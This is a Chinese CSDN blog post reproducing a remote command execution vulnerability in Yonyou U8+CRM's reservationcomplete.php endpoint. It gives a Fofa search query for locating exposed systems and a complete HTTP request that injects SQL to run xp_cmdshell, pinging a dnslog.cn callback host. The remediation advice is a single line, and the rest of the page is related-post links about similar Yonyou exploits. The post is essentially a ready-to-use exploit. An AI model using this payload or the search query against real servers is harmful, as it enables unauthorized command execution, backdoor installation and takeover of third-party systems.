用友U8+CRM reservationcomplete.php 远程命令执行

于 2024-09-29 15:47:06 发布
阅读量163 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: php 网络 开发语言 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/142637031
版权

0x01 产品描述:

        用友U8-CRM是企业利用信息技术,是一项商业策略,它通过依据市场细分组织企业资源、培养以客户为中心的经营行为、执行以客户为中心的业务流程等手段来优化企业的客户满意度和获利能力。

0x02 漏洞描述:

        用友U8-CRM系统 /reservationcomplete.php 接口存在远程命令执行漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。该漏洞利用难度较低,建议受影响的用户尽快修复

0x03 搜索语句:

Fofa:title="用友U8CRM"

0x04 漏洞复现:

GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27ping%20.dnslog.cn%27; HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
Cookie: ID_LIST_OL_10_0_0_MessageItem__Subject=250; PHPSESSID=bgsessss-
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 75

0x05 修复建议:

厂商已发布补丁 请即时修复

iSee857
关注
专栏目录
用友U8 CRM reservationcomplete.php SQL注入致RCE漏洞复现
0xSec
07-26 1493
用友U8CRM客户关系管理系统reservationcomplete.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。
用友U8+CRM 逻辑漏洞登录后台漏洞复现
0xSec
01-06 1514
​ 用友 U8 CRM客户关系管理系统reservationcomplete.php文件存在逻辑漏洞,未授权的攻击者通过漏洞可以直接登录后台,获取系统内部敏感信息,使系统处于极不安全状态。
用友U8+CRM接口reservationcomplete存在命令执行漏洞
weixin_43167326的博客
08-17 890
用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
用友U8CRM reservationcomplete.php 逻辑漏洞复现
03-21 499
用友U8+CRM是一款专为企业提供客户关系管理解决方案的软件。它通过整合多种网络化、低成本营销手段和沟通方式,帮助企业建立与客户之间通畅的交流平台。
用友CRM reservationcomplete.php逻辑漏洞登录后台
Keepb1ue的博客
01-06 590
用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。
用友 CRM reservationcomplete.php存在逻辑漏洞
3tefanie丶zhou的博客
01-09 590
【人间处处,春雨杏花急急落,车马春山慢慢行。】
用友U8+CRM 任意文件上传+读取漏洞复现
0xSec
08-13 2741
用友U8 CRM客户关系管理系统是一款专业的企业级CRM软件,旨在帮助企业高效管理客户关系、提升销售业绩和提供优质的客户服务。用友 U8 CRM客户关系管理系统 getemaildata.php 文件存在任意文件上传和任意文件读取漏洞,攻击者通过漏洞可以获取到服务器权限。
用友U8 CRM import.php 文件上传致RCE漏洞复现
0xSec
07-19 1421
用友U8CRM客户关系管理系统import.php 文件存在任意文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
用友crm客户关系管理bgt/reservationcomplete.php接口存在任意命令执行漏洞 附POC
nnn2188185的博客
08-21 57
微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发用友U8客户关系管理全面解决方案是基于中国企业最佳营销管理实践,更符合中国企业营销管理特点,客户关系管理的整合营销平台。产品融合数年来积累的知识、方法和经验,目标是帮助企业有效获取商机、提升营销能力。
用友 NC bsh.servlet.BshServlet 远程命令执行漏洞
Adminxe的博客
07-02 5452
0x00 漏洞描述 用友 NC bsh.servlet.BshServlet 存在远程命令执行漏洞,通过BeanShell 执行远程命令获取服务器权限 看到这个beanshell,就会想起来一个洞,是泛微OA的beanshell 0x01 漏洞影响 用友 NC 0x02 FOFA “用友网络” 0x03 漏洞复现 漏洞位置 /servlet/~ic/bsh.servlet.BshServlet 将POC修改为: exec(“whoami”) 0x04 利用总..
用友U8+标准介绍.ppt
03-22
用友U8+标准介绍.ppt
用友U8+白皮书V12.doc
12-18
用友U8+12.0白皮书
用友U8+标准介绍.pdf
07-01
用友U8+标准介绍.pdf
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
软希网分享源码的博客
09-23 530
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 586
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
PHP中error_reporting函数作用
sheji888的专栏
09-24 808
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
web平台搭建-LAMP(CentOS-7)
gsdgdg00的博客
09-24 733
一. 准备工作环境要求:操作系统:CentOS 7.X 64位网络配置:nmtui字符终端图形管理工具或者直接编辑配置文件关闭SELinux和firewalld防火墙防火墙:临时关闭:systemctl stop firewalld永久关闭:systemctl disable firewalld。
php中打印函数
09-24 407
PHP中,打印函数主要用于输出或显示数据。常用的打印函数包括:
基于php的医院信息管理系统
最新发布
计算机学姐的博客
09-28 551
【2025最新】基于php+vue+MySQL的医院信息管理系统,前后端分离。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

iSee857

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值